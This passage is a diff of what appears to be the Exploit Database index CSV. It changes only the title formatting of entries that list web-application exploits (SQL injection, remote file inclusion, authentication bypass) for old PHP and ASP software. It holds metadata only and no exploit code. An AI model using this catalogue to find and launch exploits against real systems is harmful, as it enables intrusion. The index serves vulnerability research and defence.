Arbitrary File Download",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4667,platforms/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 @@ -18828,7 +18832,7 @@ id,file,description,date,author,platform,type,port 4721,platforms/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 4722,platforms/php/webapps/4722.txt,"ViArt CMS/Shop/Helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] Remote File Inclusion",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0 -4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 - head.php Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0 +4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 - 'head.php' Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0 4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software - (category_id) SQL Injection",2007-12-13,MurderSkillz,php,webapps,0 4728,platforms/php/webapps/4728.txt,"Mms Gallery PHP 1.0 - 'id' Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - 'filedownload.php' Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 @@ -18846,7 +18850,7 @@ id,file,description,date,author,platform,type,port 4743,platforms/php/webapps/4743.pl,"FreeWebShop 2.2.7 - 'cookie' Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0 4750,platforms/php/webapps/4750.txt,"PHPMyRealty 1.0.x - 'search.php' SQL Injection",2007-12-18,Koller,php,webapps,0 4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 - Arbitrary File Upload",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 -4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 +4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - 'phpdns_basedir' Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0 4762,platforms/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps,0 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - 'output' Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0 @@ -18862,7 +18866,7 @@ id,file,description,date,author,platform,type,port 4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - 'go.php' SQL Injection",2007-12-23,DNX,php,webapps,0 4775,platforms/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injections",2007-12-23,MhZ91,php,webapps,0 4776,platforms/php/webapps/4776.txt,"MMSLamp - (idpro) SQL Injection",2007-12-23,x0kster,php,webapps,0 -4777,platforms/php/webapps/4777.txt,"WebSihirbazi 5.1.1 - (pageid) SQL Injection",2007-12-24,bypass,php,webapps,0 +4777,platforms/php/webapps/4777.txt,"WebSihirbazi 5.1.1 - 'pageid' SQL Injection",2007-12-24,bypass,php,webapps,0 4778,platforms/php/webapps/4778.txt,"MeGaCheatZ 1.1 - Multiple SQL Injections",2007-12-24,MhZ91,php,webapps,0 4779,platforms/php/webapps/4779.php,"CuteNews 1.4.5 - Admin Password md5 Hash Fetching Exploit",2007-12-24,waraxe,php,webapps,0 4780,platforms/php/webapps/4780.txt,"ThemeSiteScript 1.0 - 'index.php loadadminpage' Remote File Inclusion",2007-12-24,Koller,php,webapps,0 @@ -18877,7 +18881,7 @@ id,file,description,date,author,platform,type,port 4790,platforms/php/webapps/4790.txt,"RunCMS 1.6 - Multiple Vulnerabilities",2007-12-25,DSecRG,php,webapps,0 4791,platforms/php/webapps/4791.txt,"eSyndiCat Link Exchange Script 2005-2006 - SQL Injection",2007-12-25,EgiX,php,webapps,0 4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS evasion)",2007-12-26,sh2kerr,php,webapps,0 -4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A - (all modules) SQL Injection",2007-12-26,JosS,php,webapps,0 +4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A - (All Modules) SQL Injection",2007-12-26,JosS,php,webapps,0 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0 4796,platforms/php/webapps/4796.txt,"PNPHPBB2 < 1.2i - 'PHPEx' Parameter Local File Inclusion",2007-12-26,irk4z,php,webapps,0 @@ -19046,7 +19050,7 @@ id,file,description,date,author,platform,type,port 5019,platforms/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution",2008-01-30,waraxe,php,webapps,0 5020,platforms/php/webapps/5020.txt,"Joomla! Component ChronoForms 2.3.5 - Remote File Inclusion",2008-01-30,Crackers_Child,php,webapps,0 5021,platforms/php/webapps/5021.txt,"PHP Links 1.3 - 'id' Parameter SQL Injection",2008-01-30,Houssamix,php,webapps,0 -5022,platforms/php/webapps/5022.txt,"PHP Links 1.3 - smarty.php Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0 +5022,platforms/php/webapps/5022.txt,"PHP Links 1.3 - 'smarty.php' Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0 5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusion",2008-01-31,"David Wharton",php,webapps,0 5027,platforms/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure",2008-01-31,muuratsalo,php,webapps,0 5029,platforms/php/webapps/5029.txt,"Mambo Component 'com_akogallery' 2.5b - SQL Injection",2008-01-31,S@BUN,php,webapps,0 @@ -19370,7 +19374,7 @@ id,file,description,date,author,platform,type,port 5470,platforms/php/webapps/5470.py,"PHP-Fusion 6.01.14 - Blind SQL Injection",2008-04-19,The:Paradox,php,webapps,0 5471,platforms/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php' SQL Injection",2008-04-19,Crackers_Child,php,webapps,0 5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps,0 -5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 - Local File Inclusion (PHP5)",2008-04-19,KnocKout,php,webapps,0 +5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 - PHP5 Local File Inclusion",2008-04-19,KnocKout,php,webapps,0 5475,platforms/asp/webapps/5475.txt,"W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection",2008-04-20,U238,asp,webapps,0 5476,platforms/php/webapps/5476.txt,"HostDirectory Pro - Insecure Cookie Handling",2008-04-20,Crackers_Child,php,webapps,0 5477,platforms/php/webapps/5477.txt,"KubeLance 1.6.4 - 'ipn.php' Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0 @@ -21022,7 +21026,7 @@ id,file,description,date,author,platform,type,port 7560,platforms/php/webapps/7560.txt,"CMS NetCat 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0 7561,platforms/php/webapps/7561.txt,"phpGreetCards - Cross-Site Scripting / Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 7562,platforms/php/webapps/7562.txt,"PHPAdBoard - (PHP uploads) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 -7563,platforms/php/webapps/7563.txt,"phpEmployment - (PHP upload) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 +7563,platforms/php/webapps/7563.txt,"phpEmployment - 'PHP Upload' Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 7565,platforms/php/webapps/7565.txt,"StormBoard 1.0.1 - SQL Injection",2008-12-23,Samir-M,php,webapps,0 7567,platforms/php/webapps/7567.txt,"Joomla! Component com_lowcosthotels - Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0 7568,platforms/php/webapps/7568.txt,"Joomla! Component com_allhotels - Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0 @@ -21113,7 +21117,7 @@ id,file,description,date,author,platform,type,port 7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - 'ip ban' Authorized Cross-Site Scripting / Command Execution",2009-01-08,StAkeR,php,webapps,0 7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - 'comment_id' Parameter SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0 7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0 -7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - 'mydirname' Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0 +7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - 'mydirname' PHP Remote Code Execution",2009-01-08,StAkeR,php,webapps,0 7711,platforms/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,php,webapps,0 7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - SQL Injection",2009-01-11,EcHoLL,php,webapps,0 7717,platforms/php/webapps/7717.pl,"Joomla! Component com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0 @@ -21500,7 +21504,7 @@ id,file,description,date,author,platform,type,port 8366,platforms/php/webapps/8366.txt,"Joomla! Component MailTo - (article) SQL Injection",2009-04-08,H!tm@N,php,webapps,0 8367,platforms/php/webapps/8367.txt,"Joomla! Component Cmimarketplace - (viewit) Directory Traversal",2009-04-08,H!tm@N,php,webapps,0 8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0 -8373,platforms/php/webapps/8373.txt,"Xplode CMS - (wrap_script) SQL Injection",2009-04-08,PLATEN,php,webapps,0 +8373,platforms/php/webapps/8373.txt,"Xplode CMS - 'wrap_script' SQL Injection",2009-04-08,PLATEN,php,webapps,0 8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 - 'db.mdb' Database Disclosure",2009-04-08,ByALBAYX,php,webapps,0 8376,platforms/php/webapps/8376.php,"Geeklog 1.5.2 - 'SEC_authenticate()' SQL Injection",2009-04-09,Nine:Situations:Group,php,webapps,0 8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure",2009-04-09,AlpHaNiX,asp,webapps,0 @@ -21580,7 +21584,7 @@ id,file,description,date,author,platform,type,port 8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 - 'Include' Local File Inclusion",2009-04-21,SirGod,php,webapps,0 8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - 'newlang' Local File Inclusion",2009-04-21,Kacper,php,webapps,0 8505,platforms/php/webapps/8505.txt,"Quick.CMS.Lite 0.5 - 'id' SQL Injection",2009-04-21,Player,php,webapps,0 -8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - (Cat_ID) SQL Injection",2009-04-21,Player,php,webapps,0 +8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - 'Cat_ID' SQL Injection",2009-04-21,Player,php,webapps,0 8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - Authentication Bypass",2009-04-21,Hakxer,php,webapps,0 8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",php,webapps,0 8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure",2009-04-21,YEnH4ckEr,php,webapps,0 @@ -21754,9 +21758,9 @@ id,file,description,date,author,platform,type,port 8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - 'addAdminmembercode.php' Add Admin",2009-05-26,x.CJP.x,php,webapps,0 8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - Authentication Bypass",2009-05-26,ByALBAYX,php,webapps,0 8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - 'addAdminmembercode.php' Add Admin",2009-05-26,x.CJP.x,php,webapps,0 -8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) SQL Injection",2009-05-26,KIM,php,webapps,0 +8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - 'formID' SQL Injection",2009-05-26,KIM,php,webapps,0 8811,platforms/php/webapps/8811.txt,"Joomla! Component Com_Agora 3.0.0 RC1 - Arbitrary File Upload",2009-05-26,ByALBAYX,php,webapps,0 -8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion",2009-05-26,Nine:Situations:Group,php,webapps,0 +8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion",2009-05-26,Nine:Situations:Group,php,webapps,0 8813,platforms/php/webapps/8813.txt,"Million Dollar Text Links 1.x - Insecure Cookie Handling",2009-05-27,HxH,php,webapps,0 8814,platforms/php/webapps/8814.txt,"Joomla! Component AgoraGroup 0.3.5.3 - Blind SQL Injection",2009-05-27,"Chip d3 bi0s",php,webapps,0 8815,platforms/php/webapps/8815.txt,"Easy Px 41 CMS 09.00.00B1 - (fiche) Local File Inclusion",2009-05-27,"ThE g0bL!N",php,webapps,0 @@ -21811,13 +21815,13 @@ id,file,description,date,author,platform,type,port 8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 - Remote Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0 8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - (idx) SQL Injection",2009-06-05,snakespc,php,webapps,0 8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - Authentication Bypass",2009-06-05,"ThE g0bL!N",php,webapps,0 -8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row",2009-06-05,YEnH4ckEr,php,webapps,0 +8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (Delete Row) 'code' SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0 8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - (dest) Blind SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0 8886,platforms/php/webapps/8886.txt,"MyCars Automotive - Authentication Bypass",2009-06-08,snakespc,php,webapps,0 8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - 'zHk8dEes3.txt' File Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 8890,platforms/asp/webapps/8890.txt,"FipsCMS Light 2.1 - 'db.mdb' Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 8891,platforms/php/webapps/8891.txt,"Joomla! Component com_school 1.4 - (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 -8892,platforms/php/webapps/8892.txt,"Virtue Classifieds - (category) SQL Injection",2009-06-08,OzX,php,webapps,0 +8892,platforms/php/webapps/8892.txt,"Virtue Classifieds - 'category' SQL Injection",2009-06-08,OzX,php,webapps,0 8893,platforms/php/webapps/8893.txt,"Virtue Book Store - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0 8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0 @@ -22032,7 +22036,7 @@ id,file,description,date,author,platform,type,port 9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - 'index.php idAuthor' SQL Injection",2009-07-24,NoGe,php,webapps,0 9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - Authentication Bypass",2009-07-24,SwEET-DeViL,php,webapps,0 -9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - (codigo) SQL Injection",2009-07-24,s4r4d0,php,webapps,0 +9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - 'codigo' SQL Injection",2009-07-24,s4r4d0,php,webapps,0 9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - 'url' Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection",2009-07-24,Coksnuss,php,webapps,0 @@ -22045,7 +22049,7 @@ id,file,description,date,author,platform,type,port 9260,platforms/php/webapps/9260.txt,"skadate dating - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 9261,platforms/php/webapps/9261.txt,"XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 -9263,platforms/php/webapps/9263.txt,"URA 3.0 - (cat) SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0 +9263,platforms/php/webapps/9263.txt,"URA 3.0 - 'cat' SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0 9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 - Local File Inclusion / SQL Injection",2009-07-27,SirGod,php,webapps,0 9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 - 'Cat_ID' SQL Injection",2009-07-27,octopos,php,webapps,0 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script - 'home.php' Remote File Inclusion",2009-07-27,int_main();,php,webapps,0 @@ -22117,13 +22121,13 @@ id,file,description,date,author,platform,type,port 9371,platforms/php/webapps/9371.txt,"opennews 1.0 - SQL Injection / Remote Code Execution",2009-08-05,SirGod,php,webapps,0 9372,platforms/php/webapps/9372.txt,"Portel 2008 - 'decide.php patron' Blind SQL Injection",2009-08-05,"Chip d3 bi0s",php,webapps,0 9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - Topic Delete / Cross-Site Scripting",2009-08-06,int_main();,php,webapps,0 -9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 +9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - 'showUid' SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - SQL Injection / File Inclusion",2009-08-06,int_main();,php,webapps,0 9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple SQL Injections",2009-08-07,SwEET-DeViL,php,webapps,0 9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - Authentication Bypass",2009-08-07,Red-D3v1L,php,webapps,0 9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0 9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - (forumid) SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0 -9390,platforms/php/webapps/9390.txt,"Typing Pal 1.0 - (idTableProduit) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 +9390,platforms/php/webapps/9390.txt,"Typing Pal 1.0 - 'idTableProduit' SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - (Authentication Bypass) Blind SQL Injection",2009-08-07,"Jafer Al Zidjali",php,webapps,0 9395,platforms/php/webapps/9395.txt,"PHPCityPortal - Authentication Bypass",2009-08-07,CoBRa_21,php,webapps,0 9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - (Local File Inclusion / Remote File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities",2009-08-07,Moudi,php,webapps,0 @@ -22158,7 +22162,7 @@ id,file,description,date,author,platform,type,port 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 -9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 +9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - 'UploadID' SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0 9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,php,webapps,0 9461,platforms/php/webapps/9461.txt,"E CMS 1.0 - 'index.php s' SQL Injection",2009-08-18,Red-D3v1L,php,webapps,0 @@ -22201,7 +22205,7 @@ id,file,description,date,author,platform,type,port 9532,platforms/php/webapps/9532.txt,"allomani 2007 - (cat) SQL Injection",2009-08-26,"NeX HaCkEr",php,webapps,0 9533,platforms/php/webapps/9533.txt,"PHPSANE 0.5.0 - 'save.php' Remote File Inclusion",2009-08-26,CoBRa_21,php,webapps,0 9534,platforms/php/webapps/9534.txt,"Joomla! Component com_digifolio 1.52 - 'id' SQL Injection",2009-08-27,v3n0m,php,webapps,0 -9535,platforms/php/webapps/9535.txt,"Uiga Church Portal - (year) SQL Injection",2009-08-27,Mr.SQL,php,webapps,0 +9535,platforms/php/webapps/9535.txt,"Uiga Church Portal - 'year' SQL Injection",2009-08-27,Mr.SQL,php,webapps,0 9538,platforms/php/webapps/9538.txt,"Silurus Classifieds System - 'category.php' SQL Injection",2009-08-28,Mr.SQL,php,webapps,0 9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - 'index.php s' SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta - 'listings.php op' SQL Injection",2009-08-31,Mr.SQL,php,webapps,0 @@ -22276,7 +22280,7 @@ id,file,description,date,author,platform,type,port 9713,platforms/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0 9714,platforms/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0 9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,multiple,webapps,0 -9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System - header.php Remote File Inclusion",2009-09-18,"EA Ngel",multiple,webapps,0 +9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System - 'header.php' Remote File Inclusion",2009-09-18,"EA Ngel",multiple,webapps,0 9719,platforms/multiple/webapps/9719.txt,"FanUpdate 2.2.1 - show-cat.php SQL Injection",2009-09-18,"(In)Security Romania",multiple,webapps,0 9720,platforms/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusion",2009-09-18,NoGe,multiple,webapps,0 9721,platforms/multiple/webapps/9721.txt,"Joomla! Component com_surveymanager 1.5.0 - SQL Injection (stype)",2009-09-21,kaMtiEz,multiple,webapps,0 @@ -22342,7 +22346,7 @@ id,file,description,date,author,platform,type,port 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 9907,platforms/cgi/webapps/9907.rb,"The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include",1999-11-05,patrick,cgi,webapps,0 -9908,platforms/php/webapps/9908.rb,"BASE 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 +9908,platforms/php/webapps/9908.rb,"BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)",2006-05-04,patrick,cgi,webapps,0 9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d - graph_view.php Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps,0 9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2 < 6.1 - configdir Command Injection (Metasploit)",2005-01-15,"Matteo Cantoni",cgi,webapps,0 @@ -22465,9 +22469,9 @@ id,file,description,date,author,platform,type,port 10290,platforms/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps,0 10291,platforms/php/webapps/10291.txt,"Joomla! Component ProofReader 1.0 RC6 - Cross-Site Scripting",2009-12-01,MustLive,php,webapps,0 10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,multiple,webapps,0 -10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,php,webapps,0 +10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - (News Module) Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,php,webapps,0 10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0 -10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart - (prodid) SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0 +10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart - 'prodid' SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0 10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10302,platforms/php/webapps/10302.txt,"427BB 2.3.2 - SQL Injection",2009-12-04,cr4wl3r,php,webapps,0 10304,platforms/php/webapps/10304.txt,"Invision Power Board 2.3.6/3.0.4 - Local File Inclusion / SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 @@ -22882,7 +22886,7 @@ id,file,description,date,author,platform,type,port 10971,platforms/php/webapps/10971.txt,"Joomla! Component Bamboo Simpla Admin Template - SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 10972,platforms/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0 10974,platforms/php/webapps/10974.txt,"Simple Portal 2.0 - Authentication Bypass",2010-01-03,Red-D3v1L,php,webapps,0 -10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop - (productdetail) SQL Injection",2010-01-03,Err0R,php,webapps,0 +10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop - 'productdetail' SQL Injection",2010-01-03,Err0R,php,webapps,0 10977,platforms/php/webapps/10977.txt,"Smart Vision Script News - 'newsdetail.php' SQL Injection (1)",2010-01-03,Err0R,php,webapps,0 10978,platforms/php/webapps/10978.txt,"Elite Gaming Ladders 3.0 - SQL Injection",2010-01-03,Sora,php,webapps,0 10979,platforms/php/webapps/10979.txt,"Joomla! Component com_oziogallery2 / IMAGIN - Arbitrary File Write",2010-01-03,"Ubik and er",php,webapps,0 @@ -22947,7 +22951,7 @@ id,file,description,date,author,platform,type,port 11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 - SQL Injection / Cross-Site Scripting",2010-01-11,Red-D3v1L,php,webapps,0 11110,platforms/php/webapps/11110.txt,"Image Hosting Script - Arbitrary File Upload",2010-01-11,R3d-D3V!L,php,webapps,0 11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion",2010-01-11,kaMtiEz,php,webapps,0 -11113,platforms/php/webapps/11113.txt,"tincan ltd - (section) SQL Injection",2010-01-11,ALTBTA,php,webapps,0 +11113,platforms/php/webapps/11113.txt,"tincan ltd - 'section' SQL Injection",2010-01-11,ALTBTA,php,webapps,0 11116,platforms/php/webapps/11116.html,"Alwjeez Script - Database Backup",2010-01-11,alnjm33,php,webapps,0 11120,platforms/php/webapps/11120.txt,"Layout CMS 1.0 - SQL Injection / Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps,0 11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,php,webapps,0 @@ -23679,7 +23683,7 @@ id,file,description,date,author,platform,type,port 12355,platforms/php/webapps/12355.pl,"Excitemedia CMS - SQL Injection",2010-04-23,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 12358,platforms/php/webapps/12358.txt,"Memorial Web Site 